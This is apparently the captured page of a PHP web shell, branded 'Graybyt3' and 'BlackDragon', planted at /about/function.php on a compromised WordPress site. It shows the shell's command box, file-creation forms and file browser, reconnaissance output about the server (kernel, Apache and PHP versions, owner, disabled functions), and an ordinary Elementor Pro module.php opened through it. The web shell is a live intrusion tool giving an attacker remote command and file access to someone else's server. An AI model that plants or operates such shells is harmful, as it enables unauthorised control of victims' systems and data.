Graybyt3 Was Here
Linux webservices-17 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
Apache/2.4.65 (Unix) OpenSSL/1.1.1f
127.0.0.1
/
home
/
sihate-co
/
webapps
/
sihate-co
/
public
/
wp-content
/
plugins
/
elementor-pro
/
modules
/
motion-fx
[ HOME ]
Exec
Submit
File Name : module.php
<?php namespace ElementorPro\Modules\MotionFX; use Elementor\Controls_Manager; use Elementor\Element_Base; use Elementor\Element_Column; use Elementor\Element_Section; use Elementor\Widget_Base; use ElementorPro\Base\Module_Base; if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly } class Module extends Module_Base { public function __construct() { parent::__construct(); $this->add_actions(); } /** * Get module name. * * Retrieve the module name. * * @since 2.5.0 * @access public * * @return string Module name. */ public function get_name() { return 'motion-fx'; } public function register_controls_group( Controls_Manager $controls_manager ) { $controls_manager->add_group_control( Controls_Group::get_type(), new Controls_Group() ); } public function add_controls_group_to_element( Element_Base $element ) { $exclude = []; $selector = '{{WRAPPER}}'; if ( $element instanceof Element_Section ) { $exclude[] = 'motion_fx_mouse'; } elseif ( $element instanceof Element_Column ) { $selector .= ' > .elementor-widget-wrap'; } elseif ( $element instanceof Widget_Base ) { $selector .= ' > .elementor-widget-container'; } $element->add_group_control( Controls_Group::get_type(), [ 'name' => 'motion_fx', 'selector' => $selector, 'exclude' => $exclude, ] ); } public function add_controls_group_to_element_background( Element_Base $element ) { $element->start_injection( [ 'of' => 'background_bg_width_mobile', ] ); $element->add_group_control( Controls_Group::get_type(), [ 'name' => 'background_motion_fx', 'exclude' => [ 'rotateZ_effect', 'tilt_effect', 'transform_origin_x', 'transform_origin_y', ], ] ); $options = [ 'separator' => 'before', 'conditions' => [ 'relation' => 'or', 'terms' => [ [ 'name' => 'background_background', 'value' => 'classic', ], [ 'terms' => [ [ 'name' => 'background_background', 'value' => 'gradient', ], [ 'name' => 'background_color', 'operator' => '!==', 'value' => '', ], [ 'name' => 'background_color_b', 'operator' => '!==', 'value' => '', ], ], ], ], ], ]; $element->update_control( 'background_motion_fx_motion_fx_scrolling', $options ); $element->update_control( 'background_motion_fx_motion_fx_mouse', $options ); $element->end_injection(); } /** * @deprecated 3.1.0 */ public function localize_settings() { Plugin::elementor()->modules_manager->get_modules( 'dev-tools' )->deprecation->deprecated_function( __METHOD__, '3.1.0' ); return []; } private function add_actions() { add_action( 'elementor/controls/register', [ $this, 'register_controls_group' ] ); add_action( 'elementor/element/section/section_effects/after_section_start', [ $this, 'add_controls_group_to_element' ] ); add_action( 'elementor/element/container/section_effects/after_section_start', [ $this, 'add_controls_group_to_element' ] ); add_action( 'elementor/element/column/section_effects/after_section_start', [ $this, 'add_controls_group_to_element' ] ); add_action( 'elementor/element/common/section_effects/after_section_start', [ $this, 'add_controls_group_to_element' ] ); add_action( 'elementor/element/section/section_background/before_section_end', [ $this, 'add_controls_group_to_element_background' ] ); add_action( 'elementor/element/container/section_background/before_section_end', [ $this, 'add_controls_group_to_element_background' ] ); add_action( 'elementor/element/column/section_style/before_section_end', [ $this, 'add_controls_group_to_element_background' ] ); } }
Back
Folder Name
Submit
File Name
File Content
Submit
System Information
Uname > Linux webservices-17 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64 Software > Apache/2.4.65 (Unix) OpenSSL/1.1.1f PHP > 7.4.33 Protocol > HTTP/1.0 IP / Port > 127.0.0.1 / 80 Mail > ON Curl > ON Owner > sihate-co MySQL > OFF Disable Function > getmyuid,passthru,leak,listen,diskfreespace,tmpfile,link,ignore_user_abort,shell_exec,dl,set_time_limit,exec,system,highlight_file,source,show_source,fpassthru,virtual,posix_ctermid,posix_getcwd,posix_getegid,posix_geteuid,posix_getgid,posix_getgrgid,posix_getgrnam,posix_getgroups,posix_getlogin,posix_getpgid,posix_getpgrp,posix_getpid,posix,_getppid,posix_getpwuid,posix_getrlimit,posix_getsid,posix_getuid,posix_isatty,posix_kill,posix_mkfifo,posix_setegid,posix_seteuid,posix_setgid,posix_setpgid,posix_setsid,posix_setuid,posix_times,posix_ttyname,posix_uname,proc_open,proc_close,proc_nice,proc_terminate,escapeshellcmd,ini_alter,popen,pcntl_exec,socket_accept,socket_bind,socket_clear_error,socket_close,socket_connect,symlink,posix_geteuid,ini_alter,socket_listen,socket_create_listen,socket_read,socket_create_pair,stream_socket_server
*ReClick For Close
File : BlackDragon /about/function.php
Name
Type
Size
Owner/Group
Permission
Last Modified
Actions
.
dir
-
1002/1003
0555
2024-12-09 10:40:55
..
dir
-
1002/1003
0555
2024-12-09 10:40:55
assets
dir
-
1002/1003
0555
2024-12-03 02:16:06
controls-group.php
text/x-php
14.13 KB
1002/1003
0644
2024-03-20 10:43:32
module.php
text/x-php
3.7 KB
1002/1003
0644
2024-03-20 10:43:32
© BlackDragon